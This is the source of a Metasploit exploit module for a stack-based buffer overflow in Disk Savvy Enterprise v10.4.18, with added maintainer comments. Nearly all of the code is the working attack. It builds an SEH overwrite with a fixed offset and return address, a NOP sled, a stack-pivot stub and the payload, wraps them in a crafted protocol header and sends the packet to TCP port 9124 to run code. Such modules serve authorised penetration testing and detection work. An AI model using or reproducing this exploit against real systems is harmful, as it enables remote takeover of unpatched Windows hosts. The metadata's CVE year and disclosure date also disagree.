GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/disk_savvy_adm.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
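class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Module metadata.
  #
  # Fix: the reference list was registered under the misspelled key
  # 'Referencess', so update_info never attached the CVE to the module and it
  # did not show up in `info` / search output. It now uses the standard
  # 'References' key. No other metadata value is changed.
  #
  # NOTE(review): the CVE is a 2018 identifier while 'DisclosureDate' is
  # 2017-01-31 — confirm which of the two is correct against the advisory.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Disk Savvy Enterprise v10.4.18',
      # Description text kept byte-for-byte as in the original listing.
      'Description'    => %q{
This module exploits a stack-based buffer overflow vulnerability
in Disk Savvy Enterprise v10.4.18, caused by improper bounds
checking of the request sent to the built-in server. This module
has been tested successfully on Windows 7 SP1 x86.
},
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Daniel Teixeira'
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x02\x0a\x0d\xf8",
          'Space'    => 800
        },
      'References'     =>
        [
          [ 'CVE', '2018-6481' ]
        ],
      'Targets'        =>
        [
          [ 'Disk Savvy Enterprise v10.4.18',
            {
              'Offset' => 124,
              'Ret'    => 0x10056d13
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2017-01-31',
      'DefaultTarget'  => 0))

    # The product's built-in server is reached over TCP/9124 by default.
    register_options([Opt::RPORT(9124)])
  end

  # Sends one request to the service and hands off to the payload handler.
  #
  # Wire layout of the request, as built below (useful for writing a network
  # detection for this traffic):
  #   header (24 bytes): 4-byte marker 75 19 ba ab, two constant 32-bit words,
  #     the buffer length twice as little-endian uint32 ("V"), and the value of
  #     the buffer's last byte as a little-endian uint32
  #   buffer: target['Offset'] NOP bytes, the SEH record for target.ret, the
  #     three-instruction stub commented inline, payload.encoded, and one
  #     random alphanumeric byte
  def exploit
    seh = generate_seh_record(target.ret)
    connect

    buffer = make_nops(target['Offset'])
    buffer << seh
    buffer << "\x83\xc4\x7f" * 13 # ADD esp,7fh
    buffer << "\x83\xc4\x21"      # ADD esp,21h
    buffer << "\xff\xe4"          # JMP esp
    buffer << payload.encoded
    # Trailing byte; its value is repeated in the last header word below.
    buffer << Rex::Text.rand_text_alphanumeric(1)

    header = "\x75\x19\xba\xab"
    header << "\x03\x00\x00\x00"
    header << "\x00\x40\x00\x00"
    header << [buffer.length].pack("V")
    header << [buffer.length].pack("V")
    header << [buffer[-1].ord].pack("V")
    packet = header
    packet << buffer

    sock.put(packet)
    handler
  end
end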